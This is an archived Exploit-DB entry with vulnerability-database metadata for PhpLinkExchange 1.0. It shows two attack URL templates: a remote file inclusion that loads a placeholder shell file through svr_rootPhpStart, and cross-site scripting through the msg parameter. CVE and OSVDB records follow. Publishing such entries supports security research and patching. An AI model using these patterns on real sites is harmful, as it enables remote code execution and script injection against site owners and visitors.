ID EDB-ID:2347
Type exploitdb
Reporter s3rv3r_hack3r
Modified 2006-09-11T00:00:00
Description
PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities. CVE-2006-4741,CVE-2006-4742. Webapps exploit for php platform
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
remote file include :
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]
xss:
http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]
# milw0rm.com [2006-09-11]
{"id": "EDB-ID:2347", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PhpLinkExchange 1.0 include/XSS Remote Vulnerabilities", "description": "PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities. CVE-2006-4741,CVE-2006-4742. Webapps exploit for php platform", "published": "2006-09-11T00:00:00", "modified": "2006-09-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2347/", "reporter": "s3rv3r_hack3r", "references": [], "cvelist": ["CVE-2006-4741", "CVE-2006-4742"], "lastseen": "2016-01-31T16:03:46", "viewCount": 6, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-01-31T16:03:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4741", "CVE-2006-4742"]}, {"type": "osvdb", "idList": ["OSVDB:32156", "OSVDB:32157"]}], "modified": "2016-01-31T16:03:46", "rev": 2}, "vulnersScore": 6.6}, "sourceHref": "https://www.exploit-db.com/download/2347/", "sourceData": "vendor :www.idevspot.com\n\nDemo : www.idevspot.com/demo/PhpStart/PhpLinkExchange\n\nBy : s3rv3r_hack3r\n\nwww: hackerz.ir & h4ckerz.com\n\nremote file include :\n\nhttp://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]\n\nxss:\n\nhttp://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]\n\n# milw0rm.com [2006-09-11]\n", "osvdbidlist": ["32157", "32156"]}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "Cross-site scripting (XSS) vulnerability in user_add.php in IDevSpot PhpLinkExchange 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-13T22:07:00", "title": "CVE-2006-4742", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4742"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/a:idevspot:phplinkexchange:1.0"], "id": "CVE-2006-4742", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4742", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:idevspot:phplinkexchange:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:24", "description": "PHP remote file inclusion vulnerability in bits_listings.php in IDevSpot PhpLinkExchange 1.0 allows remote attackers to execute arbitrary code via the svr_rootPhpStart parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-13T22:07:00", "title": "CVE-2006-4741", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4741"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/a:idevspot:phplinkexchange:1.0"], "id": "CVE-2006-4741", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4741", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:idevspot:phplinkexchange:1.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-4742"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32156](https://vulners.com/osvdb/OSVDB:32156)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0162.html\n[CVE-2006-4742](https://vulners.com/cve/CVE-2006-4742)\nBugtraq ID: 19931\n", "edition": 1, "modified": "2006-09-09T18:59:34", "published": "2006-09-09T18:59:34", "href": "https://vulners.com/osvdb/OSVDB:32157", "id": "OSVDB:32157", "title": "PhpLinkExchange user_add.php msg Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-4741"], "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 32157](https://vulners.com/osvdb/OSVDB:32157)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0162.html\n[CVE-2006-4741](https://vulners.com/cve/CVE-2006-4741)\n", "edition": 1, "modified": "2006-09-09T18:59:34", "published": "2006-09-09T18:59:34", "href": "https://vulners.com/osvdb/OSVDB:32156", "id": "OSVDB:32156", "title": "PhpLinkExchange bits_listings.php svr_rootPhpStart Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
